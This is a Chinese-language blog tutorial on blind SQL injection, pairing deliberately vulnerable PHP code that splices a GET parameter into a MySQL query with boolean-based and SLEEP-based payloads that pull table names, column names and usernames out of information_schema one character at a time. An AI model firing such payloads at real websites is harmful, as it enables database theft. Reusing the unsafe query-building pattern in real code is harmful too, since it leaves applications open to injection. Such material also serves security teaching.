盲注技术获取数据库的表、列和具体数据

lq_ioi_pl2025-02-14 14:01

一、布尔盲注 布尔盲注是通过观察应用程序的响应(如HTTP 状态码等)来判断查询条件是否为真。

1.进行数据库配置连接
复制代码 
<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';
 
 //创建数据库连接
$conn = new mysqli($host, $user, $password, $dbname);

//检查连接 
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
 
// 获取用户输入的参数
$id = $_GET['id'];
2.构造布尔盲注查询
复制代码 
$query = "SELECT * FROM users WHERE id = $id AND 1=1";
 
$result = $conn->query($query);
3.返回查询结果
复制代码 
if ($result->num_rows > 0) {
    echo "Query is TRUE (数据存在)";
} else {
    echo "Query is FALSE (数据不存在)";
}
 
// 关闭连接
$conn->close();
?>
4.攻击者可以通过修改 id 参数,一点点推断数据库信息

获取表名

复制代码 
sql
  id=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'

获取列名

复制代码 
sql
  id=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'

获取数据

复制代码 
sql
  id=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'

二、时间盲注 时间盲注是通过在 SQL 查询中插入时间延迟函数(如 SLEEP()),根据数据库响应时间来判断查询条件是否为真。

1.进行数据库配置连接
复制代码 
<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';
 
 //创建数据库连接
$conn = new mysqli($host, $user, $password, $dbname);

//检查连接 
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
 
// 获取用户输入的参数
$id = $_GET['id'];
2.构造时间盲注查询
复制代码 
$query = "SELECT * FROM users WHERE id = $id AND IF(1=1, SLEEP(5), 0)";
$start_time = microtime(true); // 开始时间
$result = $conn->query($query);
$end_time = microtime(true); // 结束时间
3. 计算查询耗时
复制代码 
$query_time = $end_time - $start_time;
4.根据查询时间判断结果
复制代码 
if ($query_time > 5) {
    echo "Query is TRUE (延迟 5 秒)";
} else {
    echo "Query is FALSE (无延迟)";
}
// 关闭连接
$conn->close();
?>
5.攻击者可以通过修改 id 参数,逐步推断数据库信息

获取表名

复制代码 
sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)

获取列名

复制代码 
sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)

获取数据

复制代码 
sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)

三、获取表、列、具体数据的函数

1.获取表名

复制代码 
sql
  id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97

2.获取列名

复制代码 
sql
  id=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117

3.获取数据

复制代码 
sql
  id=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97
相关推荐
YJlio11 分钟前
「C++ 40 周年」:从“野蛮生长的指针地狱”到 AI 时代的系统底座
c++·人工智能·oracle
TDengine (老段)30 分钟前
TDengine 转换函数 TO_JSON 用户手册
android·大数据·数据库·json·时序数据库·tdengine·涛思数据
2301_8002561138 分钟前
第七章 空间存储与索引 知识点梳理3(空间填充曲线)
数据库·笔记·sql·postgresql
冰封剑心42 分钟前
MiniCPM-V-2_6 (4-bit 量化)使用
java·前端·数据库
小满、1 小时前
MySQL :存储引擎原理、索引结构与执行计划
数据库·mysql·索引·mysql 存储引擎
x***13391 小时前
SQL Server 创建用户并授权
数据库·oracle
JIngJaneIL1 小时前
智慧物业|物业管理|基于SprinBoot+vue的智慧物业管理系统(源码+数据库+文档)
java·前端·数据库·vue.js·spring boot·论文·智慧物业管理系统
枫叶梨花2 小时前
一次 Kettle 中文乱码写入失败的完整排查实录
数据库·后端
Gobysec2 小时前
Goby 漏洞安全通告|Oracle Identity Manager 命令执行漏洞(CVE-2025-61757)
安全·oracle·漏洞检测·cve-2025-61757·漏洞研究
笃行客从不躺平2 小时前
遇到大SQL怎么处理
java·开发语言·数据库·sql
热门推荐
01GitHub 镜像站点02【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南08Labelme从安装到标注:零基础完整指南09全球最强模型Grok4,国内已可免费使用!(附教程)1046个Nano-banana 精选提示词,持续更新中